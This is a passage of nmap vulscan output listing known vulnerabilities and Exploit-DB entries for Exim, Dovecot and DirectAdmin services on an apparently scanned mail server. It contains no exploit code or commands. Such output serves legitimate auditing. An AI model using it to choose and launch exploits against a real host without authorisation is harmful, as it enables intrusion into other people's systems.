16965| [CVE-2004-0400] Stack-based buffer overflow in Exim 4 before 4.33, when the headers_check_syntax option is enabled, allows remote attackers to cause a denial of service and possibly execute arbitrary code during the header check.
16966| [CVE-2004-0399] Stack-based buffer overflow in Exim 3.35, and other versions before 4, when the sender_verify option is true, allows remote attackers to cause a denial of service and possibly execute arbitrary code during sender verification.
16967| [CVE-2003-0743] Heap-based buffer overflow in smtp_in.c for Exim 3 (exim3) before 3.36 and Exim 4 (exim4) before 4.21 may allow remote attackers to execute arbitrary code via an invalid (1) HELO or (2) EHLO argument with a large number of spaces followed by a NULL character and a newline, which is not properly trimmed before the "(no argument given)" string is appended to the buffer.
16968| [CVE-2002-1381] Format string vulnerability in daemon.c for Exim 4.x through 4.10, and 3.x through 3.36, allows exim administrative users to execute arbitrary code by modifying the pid_file_path value.
16969|
16970| SecurityFocus - https://www.securityfocus.com/bid/:
16971| [103049] Exim 'base64d()' Function Buffer Overflow Vulnerability
16972| [99252] Exim CVE-2017-1000369 Local Privilege Escalation Vulnerability
16973| [94947] Exim CVE-2016-9963 Unspecified Information Disclosure Vulnerability
16974| [84132] Exim CVE-2016-1531 Local Privilege Escalation Vulnerability
16975| [68857] Exim CVE-2014-2972 Local Privilege Escalation Vulnerability
16976| [67695] Exim 'dmarc.c' Remote Code Execution Vulnerability
16977| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
16978| [56285] Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
16979| [47836] Exim DKIM CVE-2011-1407 Remote Code Execution Vulnerability
16980| [47736] Exim 'dkim_exim_verify_finish()' Remote Format String Vulnerability
16981| [46065] Exim 'log.c' Local Privilege Escalation Vulnerability
16982| [45341] Exim ALT_CONFIG_ROOT_ONLY 'exim' User Local Privilege Escalation Vulnerability
16983| [45308] Exim Crafted Header Remote Code Execution Vulnerability
16984| [40454] Exim MBX Locking Insecure Temporary File Creation Vulnerability
16985| [40451] Exim Sticky Mail Directory Local Privilege Escalation Vulnerability
16986| [36181] ikiwiki 'teximg' Plugin Insecure TeX Commands Information Disclosure Vulnerability
16987| [23977] Exim SpamAssassin Reply Remote Buffer Overflow Vulnerability
16988| [17110] sa-exim Unauthorized File Access Vulnerability
16989| [12268] Exim IP Address Command Line Argument Local Buffer Overflow Vulnerability
16990| [12188] Exim SPA Authentication Remote Buffer Overflow Vulnerability
16991| [12185] Exim Illegal IPv6 Address Buffer Overflow Vulnerability
16992| [10291] Exim Header Syntax Checking Remote Stack Buffer Overrun Vulnerability
16993| [10290] Exim Sender Verification Remote Stack Buffer Overrun Vulnerability
16994| [8518] Exim EHLO/HELO Remote Heap Corruption Vulnerability
16995| [6314] Exim Internet Mailer Format String Vulnerability
16996| [4096] Exim Configuration File Argument Command Line Buffer Overflow Vulnerability
16997| [3728] Exim Pipe Hostname Arbitrary Command Execution Vulnerability
16998| [2828] Exim Format String Vulnerability
16999| [1859] Exim Buffer Overflow Vulnerability
17000|
17001| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17002| [84758] Exim sender_address parameter command execution
17003| [84015] Exim command execution
17004| [80186] Mozilla Firefox, Thunderbird, and SeaMonkey copyTexImage2D code execution
17005| [80184] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D calls code execution
17006| [79615] Exim dkim_exim_query_dns_txt() buffer overflow
17007| [75155] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D denial of service
17008| [67455] Exim DKIM processing code execution
17009| [67299] Exim dkim_exim_verify_finish() format string
17010| [65028] Exim open_log privilege escalation
17011| [63967] Exim config file privilege escalation
17012| [63960] Exim header buffer overflow
17013| [59043] Exim mail directory privilege escalation
17014| [59042] Exim MBX symlink
17015| [52922] ikiwiki teximg plugin information disclosure
17016| [34265] Exim spamd buffer overflow
17017| [25286] Sa-exim greylistclean.cron file deletion
17018| [22687] RHSA-2005:025 updates for exim not installed
17019| [18901] Exim dns_build_reverse buffer overflow
17020| [18764] Exim spa_base64_to_bits function buffer overflow
17021| [18763] Exim host_aton buffer overflow
17022| [16079] Exim require_verify buffer overflow
17023| [16077] Exim header_check_syntax buffer overflow
17024| [16075] Exim sender_verify buffer overflow
17025| [13067] Exim HELO or EHLO command heap overflow
17026| [10761] Exim daemon.c format string
17027| [8194] Exim configuration file -c command-line argument buffer overflow
17028| [7738] Exim allows attacker to hide commands in localhost names using pipes
17029| [6671] Exim "
17030| [1893] Exim MTA allows local users to gain root privileges
17031|
17032| Exploit-DB - https://www.exploit-db.com:
17033| [16925] Exim4 <= 4.69 - string_format Function Heap Buffer Overflow
17034| [15725] Exim 4.63 Remote Root Exploit
17035| [1009] Exim <= 4.41 dns_build_reverse Local Exploit
17036| [812] Exim <= 4.43 auth_spa_server() Remote PoC Exploit
17037| [796] Exim <= 4.42 Local Root Exploit
17038| [756] Exim <= 4.41 dns_build_reverse Local Exploit PoC
17039|
17040| OpenVAS (Nessus) - http://www.openvas.org:
17041| [100663] Exim < 4.72 RC2 Multiple Vulnerabilities
17042|
17043| SecurityTracker - https://www.securitytracker.com:
17044| [1025539] Exim DKIM Processing Flaw Lets Remote Users Execute Arbitrary Code
17045| [1025504] Exim DKIM Signature Format String Flaw Lets Remote Users Execute Arbitrary Code
17046| [1024859] Exim Configuration File Capability Lets Local Users Gain Elevated Privileges
17047| [1024858] Exim Buffer Overfow in string_format() Lets Remote Users Execute Arbitrary Code
17048| [1012904] Exim Buffer Overflow in dns_build_reverse() Lets Local Users Obtain Elevated Privileges
17049| [1012771] Exim Buffer Overflows in host_aton() and spa_base64_to_bits() May Let Local Users Gain Elevated Privileges
17050| [1010081] Exim Buffer Overflows in 'accept.c' and 'verify.c' Let Remote Users Execute Arbitrary Code
17051| [1007609] Exim Heap Overflow in 'smtp_in.c' May Allow Remote Arbitrary Code Execution
17052| [1005756] Exim Mail Server Format String Bug Lets Local Exim Administrators Execute Arbitrary Code With Root Privileges
17053| [1003547] Potential Bug in Exim Mail Server May Let Local Users Execute Code With Root Privileges
17054| [1003014] Exim Mail Server Pipe Address Validation Error May Let Remote Users Execute Arbitrary Code With Root Privileges in a Certain Configuration
17055| [1001694] Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
17056|
17057| OSVDB - http://www.osvdb.org:
17058| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
17059| [87599] Mozilla Multiple Product copyTexImage2D Call Image Dimension Handling Memory Corruption
17060| [87581] Mozilla Multiple Product texImage2D Call Handling Memory Corruption
17061| [86616] Exim src/dkim.c dkim_exim_query_dns_txt() Function DNS Record Parsing Remote Overflow
17062| [81523] Mozilla Multiple Product WebGL texImage2D() Function JSVAL_TO_OBJECT Remote Code Execution
17063| [72642] Exim DKIM Identity Lookup Item Remote Code Execution
17064| [72156] Exim src/dkim.c dkim_exim_verify_finish() Function DKIM-Signature Header Format String
17065| [70696] Exim log.c open_log() Function Local Privilege Escalation
17066| [69860] Exim exim User Account Configuration File Directive Local Privilege Escalation
17067| [69685] Exim string_format Function Remote Overflow
17068| [65159] Exim transports/appendfile.c MBX Locking Race Condition Permission Modification
17069| [65158] Exim transports/appendfile.c Hardlink Handling Arbitrary File Overwrite
17070| [57575] teximg Plugin for ikiwiki TEX Command Arbitrary File Local Disclosure
17071| [23849] sa-exim greylistclean.cron Arbitrary File Deletion
17072| [13073] Oracle Database Server Advanced Queuing Component dbms_transform_eximp Unspecified Security Issue
17073| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
17074| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
17075| [12726] Exim -be Command Line Option host_aton Function Local Overflow
17076| [10877] Exim smtp_in.c HELO/EHLO Remote Overflow
17077| [10360] Exim daemon.c pid_file_path Variable Manipulation Arbitrary Command Execution
17078| [10032] libXpm CreateXImage Function Integer Overflow
17079| [7160] Exim .forward :include: Option Privilege Escalation
17080| [6479] Vexim COOKIE Authentication Credential Disclosure
17081| [6478] Vexim Multiple Parameter SQL Injection
17082| [5930] Exim Parenthesis File Name Filter Bypass
17083| [5897] Exim header_syntax Function Remote Overflow
17084| [5896] Exim sender_verify Function Remote Overflow
17085| [5530] Exim Localhost Name Arbitrary Command Execution
17086| [5330] Exim Configuration File Variable Overflow
17087| [1855] Exim Batched SMTP Mail Header Format String
17088|_
587/tcp open smtp syn-ack Exim smtpd
17090| vulscan: VulDB - https://vuldb.com:
17091| [113048] Exim up to 4.90 SMTP Listener Message memory corruption
17092| [109969] Exim 4.88/4.89 SMTP Daemon receive.c bdat_getc denial of service
17093| [109968] Exim 4.88/4.89 SMTP Daemon receive.c receive_msg memory corruption
17094| [94599] Exim up to 4.87 information disclosure
17095| [72414] Avexim Noticias Bebes Beybies 1 X.509 Certificate spoofing
17096| [13422] Exim 4.82 Mail Header dmarc.c expand_string() memory corruption
17097| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
17098| [6989] Mozilla Firefox/Thunderbird 16.0.1/16.0.2 Image Dimension copyTexImage2D memory corruption
17099| [6971] Mozilla Firefox/Thunderbird 16.0.1/16.0.2 texImage2D Call memory corruption
17100| [6817] Exim up to 4.80 src/dkim.c dkim_exim_query_dns_txt() memory corruption
17101| [5313] Mozilla Firefox up to 11.0 WebGL texImage2D() denial of service
17102| [58841] exim up to 4.69 dkim_exim_verify_finish memory corruption
17103| [57462] Exim up to 4.75 Filesystem memory corruption
17104| [4280] Exim Server 4.x open_log() race condition
17105| [55724] Exim up to 3.14 string.c string_vformat memory corruption
17106|
17107| MITRE CVE - https://cve.mitre.org:
17108| [CVE-2012-5838] The copyTexImage2D implementation in the WebGL subsystem in Mozilla Firefox before 17.0, Thunderbird before 17.0, and SeaMonkey before 2.14 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via large image dimensions.
17109| [CVE-2012-5833] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox before 17.0, Firefox ESR 10.x before 10.0.11, Thunderbird before 17.0, Thunderbird ESR 10.x before 10.0.11, and SeaMonkey before 2.14 does not properly interact with Mesa drivers, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via function calls involving certain values of the level parameter.
17110| [CVE-2012-5671] Heap-based buffer overflow in the dkim_exim_query_dns_txt function in dkim.c in Exim 4.70 through 4.80, when DKIM support is enabled and acl_smtp_connect and acl_smtp_rcpt are not set to "warn control = dkim_disable_verify," allows remote attackers to execute arbitrary code via an email from a malicious DNS server.
17111| [CVE-2012-2140] The Mail gem before 2.4.3 for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a (1) sendmail or (2) exim delivery.
17112| [CVE-2012-0478] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 does not properly restrict JSVAL_TO_OBJECT casts, which might allow remote attackers to execute arbitrary code via a crafted web page.
17113| [CVE-2011-1764] Format string vulnerability in the dkim_exim_verify_finish function in src/dkim.c in Exim before 4.76 might allow remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via format string specifiers in data used in DKIM logging, as demonstrated by an identity field containing a % (percent) character.
17114| [CVE-2011-1407] The DKIM implementation in Exim 4.7x before 4.76 permits matching for DKIM identities to apply to lookup items, instead of only strings, which allows remote attackers to execute arbitrary code or access a filesystem via a crafted identity.
17115| [CVE-2011-0017] The open_log function in log.c in Exim 4.72 and earlier does not check the return value from (1) setuid or (2) setgid system calls, which allows local users to append log data to arbitrary files via a symlink attack.
17116| [CVE-2010-4345] Exim 4.72 and earlier allows local users to gain privileges by leveraging the ability of the exim user account to specify an alternate configuration file with a directive that contains arbitrary commands, as demonstrated by the spool_directory directive.
17117| [CVE-2010-4344] Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
17118| [CVE-2010-2024] transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.
17119| [CVE-2010-2023] transports/appendfile.c in Exim before 4.72, when a world-writable sticky-bit mail directory is used, does not verify the st_nlink field of mailbox files, which allows local users to cause a denial of service or possibly gain privileges by creating a hard link to another user's file.
17120| [CVE-2009-2944] Incomplete blacklist vulnerability in the teximg plugin in ikiwiki before 3.1415926 and 2.x before 2.53.4 allows context-dependent attackers to read arbitrary files via crafted TeX commands.
17121| [CVE-2009-1417] gnutls-cli in GnuTLS before 2.6.6 does not verify the activation and expiration times of X.509 certificates, which allows remote attackers to successfully present a certificate that is (1) not yet valid or (2) no longer valid, related to lack of time checks in the _gnutls_x509_verify_certificate function in lib/x509/verify.c in libgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup.
17122| [CVE-2006-1251] Argument injection vulnerability in greylistclean.cron in sa-exim 4.2 allows remote attackers to delete arbitrary files via an email with a To field that contains a filename separated by whitespace, which is not quoted when greylistclean.cron provides the argument to the rm command.
17123| [CVE-2005-0022] Buffer overflow in the spa_base64_to_bits function in Exim before 4.43, as originally obtained from Samba code, and as called by the auth_spa_client function, may allow attackers to execute arbitrary code during SPA authentication.
17124| [CVE-2005-0021] Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
17125| [CVE-2004-2571] Multiple buffer overflows in EnderUNIX isoqlog 2.1.1 allow remote attackers to execute arbitrary code via the (1) parseQmailFromBytesLine, (2) parseQmailToRemoteLine, (3) parseQmailToLocalLine, (4) parseSendmailFromBytesLine, (5) parseSendmailToLine, (6) parseEximFromBytesLine, and (7) parseEximToLine functions in Parser.c
17126| [CVE-2004-0688] Multiple integer overflows in (1) the xpmParseColors function in parse.c, (2) XpmCreateImageFromXpmImage, (3) CreateXImage, (4) ParsePixels, and (5) ParseAndPutPixels for libXpm before 6.8.1 may allow remote attackers to execute arbitrary code via a malformed XPM image file.
17127| [CVE-2004-0400] Stack-based buffer overflow in Exim 4 before 4.33, when the headers_check_syntax option is enabled, allows remote attackers to cause a denial of service and possibly execute arbitrary code during the header check.
17128| [CVE-2004-0399] Stack-based buffer overflow in Exim 3.35, and other versions before 4, when the sender_verify option is true, allows remote attackers to cause a denial of service and possibly execute arbitrary code during sender verification.
17129| [CVE-2003-0743] Heap-based buffer overflow in smtp_in.c for Exim 3 (exim3) before 3.36 and Exim 4 (exim4) before 4.21 may allow remote attackers to execute arbitrary code via an invalid (1) HELO or (2) EHLO argument with a large number of spaces followed by a NULL character and a newline, which is not properly trimmed before the "(no argument given)" string is appended to the buffer.
17130| [CVE-2002-1381] Format string vulnerability in daemon.c for Exim 4.x through 4.10, and 3.x through 3.36, allows exim administrative users to execute arbitrary code by modifying the pid_file_path value.
17131| [CVE-2002-0274] Exim 3.34 and earlier may allow local users to gain privileges via a buffer overflow in long -C (configuration file) and other command line arguments.
17132| [CVE-2001-0889] Exim 3.22 and earlier, in some configurations, does not properly verify the local part of an address when redirecting the address to a pipe, which could allow remote attackers to execute arbitrary commands via shell metacharacters.
17133| [CVE-2001-0690] Format string vulnerability in exim (3.22-10 in Red Hat, 3.12 in Debian and 3.16 in Conectiva) in batched SMTP mode allows a remote attacker to execute arbitrary code via format strings in SMTP mail headers.
17134| [CVE-1999-0971] Buffer overflow in Exim allows local users to gain root privileges via a long :include: option in a .forward file.
17135|
17136| SecurityFocus - https://www.securityfocus.com/bid/:
17137| [103049] Exim 'base64d()' Function Buffer Overflow Vulnerability
17138| [99252] Exim CVE-2017-1000369 Local Privilege Escalation Vulnerability
17139| [94947] Exim CVE-2016-9963 Unspecified Information Disclosure Vulnerability
17140| [84132] Exim CVE-2016-1531 Local Privilege Escalation Vulnerability
17141| [68857] Exim CVE-2014-2972 Local Privilege Escalation Vulnerability
17142| [67695] Exim 'dmarc.c' Remote Code Execution Vulnerability
17143| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
17144| [56285] Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
17145| [47836] Exim DKIM CVE-2011-1407 Remote Code Execution Vulnerability
17146| [47736] Exim 'dkim_exim_verify_finish()' Remote Format String Vulnerability
17147| [46065] Exim 'log.c' Local Privilege Escalation Vulnerability
17148| [45341] Exim ALT_CONFIG_ROOT_ONLY 'exim' User Local Privilege Escalation Vulnerability
17149| [45308] Exim Crafted Header Remote Code Execution Vulnerability
17150| [40454] Exim MBX Locking Insecure Temporary File Creation Vulnerability
17151| [40451] Exim Sticky Mail Directory Local Privilege Escalation Vulnerability
17152| [36181] ikiwiki 'teximg' Plugin Insecure TeX Commands Information Disclosure Vulnerability
17153| [23977] Exim SpamAssassin Reply Remote Buffer Overflow Vulnerability
17154| [17110] sa-exim Unauthorized File Access Vulnerability
17155| [12268] Exim IP Address Command Line Argument Local Buffer Overflow Vulnerability
17156| [12188] Exim SPA Authentication Remote Buffer Overflow Vulnerability
17157| [12185] Exim Illegal IPv6 Address Buffer Overflow Vulnerability
17158| [10291] Exim Header Syntax Checking Remote Stack Buffer Overrun Vulnerability
17159| [10290] Exim Sender Verification Remote Stack Buffer Overrun Vulnerability
17160| [8518] Exim EHLO/HELO Remote Heap Corruption Vulnerability
17161| [6314] Exim Internet Mailer Format String Vulnerability
17162| [4096] Exim Configuration File Argument Command Line Buffer Overflow Vulnerability
17163| [3728] Exim Pipe Hostname Arbitrary Command Execution Vulnerability
17164| [2828] Exim Format String Vulnerability
17165| [1859] Exim Buffer Overflow Vulnerability
17166|
17167| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17168| [84758] Exim sender_address parameter command execution
17169| [84015] Exim command execution
17170| [80186] Mozilla Firefox, Thunderbird, and SeaMonkey copyTexImage2D code execution
17171| [80184] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D calls code execution
17172| [79615] Exim dkim_exim_query_dns_txt() buffer overflow
17173| [75155] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D denial of service
17174| [67455] Exim DKIM processing code execution
17175| [67299] Exim dkim_exim_verify_finish() format string
17176| [65028] Exim open_log privilege escalation
17177| [63967] Exim config file privilege escalation
17178| [63960] Exim header buffer overflow
17179| [59043] Exim mail directory privilege escalation
17180| [59042] Exim MBX symlink
17181| [52922] ikiwiki teximg plugin information disclosure
17182| [34265] Exim spamd buffer overflow
17183| [25286] Sa-exim greylistclean.cron file deletion
17184| [22687] RHSA-2005:025 updates for exim not installed
17185| [18901] Exim dns_build_reverse buffer overflow
17186| [18764] Exim spa_base64_to_bits function buffer overflow
17187| [18763] Exim host_aton buffer overflow
17188| [16079] Exim require_verify buffer overflow
17189| [16077] Exim header_check_syntax buffer overflow
17190| [16075] Exim sender_verify buffer overflow
17191| [13067] Exim HELO or EHLO command heap overflow
17192| [10761] Exim daemon.c format string
17193| [8194] Exim configuration file -c command-line argument buffer overflow
17194| [7738] Exim allows attacker to hide commands in localhost names using pipes
17195| [6671] Exim "
17196| [1893] Exim MTA allows local users to gain root privileges
17197|
17198| Exploit-DB - https://www.exploit-db.com:
17199| [25970] Exim sender_address Parameter - RCE Exploit
17200| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
17201| [24093] Exim Sender 3.35 Verification Remote Stack Buffer Overrun Vulnerability
17202| [22066] Exim Internet Mailer 3.35/3.36/4.10 Format String Vulnerability
17203| [20900] Exim 3.x Format String Vulnerability
17204| [20333] Exim Buffer 1.6.2/1.6.51 Overflow Vulnerability
17205| [16925] Exim4 <= 4.69 - string_format Function Heap Buffer Overflow
17206| [15725] Exim 4.63 Remote Root Exploit
17207| [1009] Exim <= 4.41 dns_build_reverse Local Exploit
17208| [812] Exim <= 4.43 auth_spa_server() Remote PoC Exploit
17209| [796] Exim <= 4.42 Local Root Exploit
17210| [756] Exim <= 4.41 dns_build_reverse Local Exploit PoC
17211|
17212| OpenVAS (Nessus) - http://www.openvas.org:
17213| [881419] CentOS Update for exim CESA-2011:0153 centos4 x86_64
17214| [881390] CentOS Update for exim CESA-2011:0153 centos5 x86_64
17215| [881363] CentOS Update for exim CESA-2010:0970 centos4 x86_64
17216| [880502] CentOS Update for exim CESA-2011:0153 centos5 i386
17217| [880468] CentOS Update for exim CESA-2011:0153 centos4 i386
17218| [880458] CentOS Update for exim CESA-2010:0970 centos4 i386
17219| [870379] RedHat Update for exim RHSA-2011:0153-01
17220| [870369] RedHat Update for exim RHSA-2010:0970-01
17221| [864833] Fedora Update for exim FEDORA-2012-17085
17222| [864827] Fedora Update for exim FEDORA-2012-17044
17223| [863098] Fedora Update for exim FEDORA-2011-7047
17224| [863096] Fedora Update for exim FEDORA-2011-7059
17225| [862979] Fedora Update for exim FEDORA-2010-12375
17226| [862146] Fedora Update for exim FEDORA-2010-9506
17227| [862138] Fedora Update for exim FEDORA-2010-9524
17228| [850355] SuSE Update for exim openSUSE-SU-2012:1404-1 (exim)
17229| [850152] SuSE Update for exim SUSE-SA:2010:059
17230| [841201] Ubuntu Update for exim4 USN-1618-1
17231| [840664] Ubuntu Update for exim4 USN-1135-1
17232| [840659] Ubuntu Update for exim4 USN-1130-1
17233| [840582] Ubuntu Update for exim4 vulnerabilities USN-1060-1
17234| [840554] Ubuntu Update for exim4 vulnerability USN-1032-1
17235| [800689] ikiwiki Teximg Plugin TeX Command Arbitrary File Disclosure Vulnerability
17236| [100663] Exim < 4.72 RC2 Multiple Vulnerabilities
17237| [72541] FreeBSD Ports: exim
17238| [72537] Debian Security Advisory DSA 2566-1 (exim4)
17239| [69766] FreeBSD Ports: exim
17240| [69735] Debian Security Advisory DSA 2236-1 (exim4)
17241| [69730] Debian Security Advisory DSA 2232-1 (exim4)
17242| [68948] exim -- local privilege escalation
17243| [68821] FreeBSD Ports: exim
17244| [54809] Gentoo Security Advisory GLSA 200501-23 (exim)
17245| [54567] Gentoo Security Advisory GLSA 200405-07 (Exim)
17246| [53811] Debian Security Advisory DSA 058-1 (exim)
17247| [53662] Debian Security Advisory DSA 376-1 (exim exim-tls)
17248| [53474] Debian Security Advisory DSA 637-1 (exim-tls)
17249| [53472] Debian Security Advisory DSA 635-1 (exim)
17250| [53385] Debian Security Advisory DSA 097-1 (exim)
17251| [53192] Debian Security Advisory DSA 502-1 (exim-tls)
17252| [53191] Debian Security Advisory DSA 501-1 (exim)
17253| [52466] FreeBSD Ports: exim, exim-ldap2, exim-mysql, exim-postgresql
17254| [52252] exim -- two buffer overflow vulnerabilities
17255|
17256| SecurityTracker - https://www.securitytracker.com:
17257| [1025539] Exim DKIM Processing Flaw Lets Remote Users Execute Arbitrary Code
17258| [1025504] Exim DKIM Signature Format String Flaw Lets Remote Users Execute Arbitrary Code
17259| [1024859] Exim Configuration File Capability Lets Local Users Gain Elevated Privileges
17260| [1024858] Exim Buffer Overfow in string_format() Lets Remote Users Execute Arbitrary Code
17261| [1012904] Exim Buffer Overflow in dns_build_reverse() Lets Local Users Obtain Elevated Privileges
17262| [1012771] Exim Buffer Overflows in host_aton() and spa_base64_to_bits() May Let Local Users Gain Elevated Privileges
17263| [1010081] Exim Buffer Overflows in 'accept.c' and 'verify.c' Let Remote Users Execute Arbitrary Code
17264| [1007609] Exim Heap Overflow in 'smtp_in.c' May Allow Remote Arbitrary Code Execution
17265| [1005756] Exim Mail Server Format String Bug Lets Local Exim Administrators Execute Arbitrary Code With Root Privileges
17266| [1003547] Potential Bug in Exim Mail Server May Let Local Users Execute Code With Root Privileges
17267| [1003014] Exim Mail Server Pipe Address Validation Error May Let Remote Users Execute Arbitrary Code With Root Privileges in a Certain Configuration
17268| [1001694] Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
17269|
17270| OSVDB - http://www.osvdb.org:
17271| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
17272| [87599] Mozilla Multiple Product copyTexImage2D Call Image Dimension Handling Memory Corruption
17273| [87581] Mozilla Multiple Product texImage2D Call Handling Memory Corruption
17274| [86616] Exim src/dkim.c dkim_exim_query_dns_txt() Function DNS Record Parsing Remote Overflow
17275| [81523] Mozilla Multiple Product WebGL texImage2D() Function JSVAL_TO_OBJECT Remote Code Execution
17276| [72642] Exim DKIM Identity Lookup Item Remote Code Execution
17277| [72156] Exim src/dkim.c dkim_exim_verify_finish() Function DKIM-Signature Header Format String
17278| [70696] Exim log.c open_log() Function Local Privilege Escalation
17279| [69860] Exim exim User Account Configuration File Directive Local Privilege Escalation
17280| [69685] Exim string_format Function Remote Overflow
17281| [65159] Exim transports/appendfile.c MBX Locking Race Condition Permission Modification
17282| [65158] Exim transports/appendfile.c Hardlink Handling Arbitrary File Overwrite
17283| [57575] teximg Plugin for ikiwiki TEX Command Arbitrary File Local Disclosure
17284| [23849] sa-exim greylistclean.cron Arbitrary File Deletion
17285| [13073] Oracle Database Server Advanced Queuing Component dbms_transform_eximp Unspecified Security Issue
17286| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
17287| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
17288| [12726] Exim -be Command Line Option host_aton Function Local Overflow
17289| [10877] Exim smtp_in.c HELO/EHLO Remote Overflow
17290| [10360] Exim daemon.c pid_file_path Variable Manipulation Arbitrary Command Execution
17291| [10032] libXpm CreateXImage Function Integer Overflow
17292| [7160] Exim .forward :include: Option Privilege Escalation
17293| [6479] Vexim COOKIE Authentication Credential Disclosure
17294| [6478] Vexim Multiple Parameter SQL Injection
17295| [5930] Exim Parenthesis File Name Filter Bypass
17296| [5897] Exim header_syntax Function Remote Overflow
17297| [5896] Exim sender_verify Function Remote Overflow
17298| [5530] Exim Localhost Name Arbitrary Command Execution
17299| [5330] Exim Configuration File Variable Overflow
17300| [1855] Exim Batched SMTP Mail Header Format String
17301|_
993/tcp open ssl/imap syn-ack
17303| fingerprint-strings:
17304| NULL:
17305|_ * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot DA ready.
995/tcp open ssl/pop3 syn-ack Dovecot DirectAdmin pop3d
17307| vulscan: VulDB - https://vuldb.com:
17308| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
17309| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
17310| [134243] InfinitumIT DirectAdmin up to 1.561 FileManager CSRF privilege escalation
17311| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
17312| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
17313| [131477] JBMC DirectAdmin 1.55 /CMD_ACCOUNT_ADMIN cross site request forgery
17314| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
17315| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
17316| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
17317| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
17318| [112266] JBMC DirectAdmin up to 1.51 email_ftp_password_change Setting memory corruption
17319| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
17320| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
17321| [95172] Directadmin Controlpanel 1.50.1 /CMD_SELECT_USERS cross site scripting
17322| [95100] DirectAdmin up to 1.50.1 Crash denial of service
17323| [69835] Dovecot 2.2.0/2.2.1 denial of service
17324| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
17325| [65684] Dovecot up to 2.2.6 unknown vulnerability
17326| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
17327| [63692] Dovecot up to 2.0.15 spoofing
17328| [7062] Dovecot 2.1.10 mail-search.c denial of service
17329| [62578] DirectAdmin 1.403 cross site scripting
17330| [61198] Jbmc-software DirectAdmin 1.403 cross site scripting
17331| [57517] Dovecot up to 2.0.12 Login directory traversal
17332| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
17333| [57515] Dovecot up to 2.0.12 Crash denial of service
17334| [54944] Dovecot up to 1.2.14 denial of service
17335| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
17336| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
17337| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
17338| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
17339| [53277] Dovecot up to 1.2.10 denial of service
17340| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
17341| [48756] Jbmc-software DirectAdmin up to 1.292 cross site scripting
17342| [48060] Jbmc-software DirectAdmin up to 1.17 privilege escalation
17343| [45256] Dovecot up to 1.1.5 directory traversal
17344| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
17345| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
17346| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
17347| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
17348| [40356] Dovecot 1.0.9 Cache unknown vulnerability
17349| [38747] DirectAdmin 1.30.2 cross site scripting
17350| [38222] Dovecot 1.0.2 directory traversal
17351| [37578] DirectAdmin 1.30.1 cross site scripting
17352| [36376] Dovecot up to 1.0.x directory traversal
17353| [36066] JBMC Software DirectAdmin 1.293 cross site scripting
17354| [35680] Jbmc Software DirectAdmin 1.293 cross site scripting
17355| [33341] JBMC Software DirectAdmin 1.28.1 cross site scripting
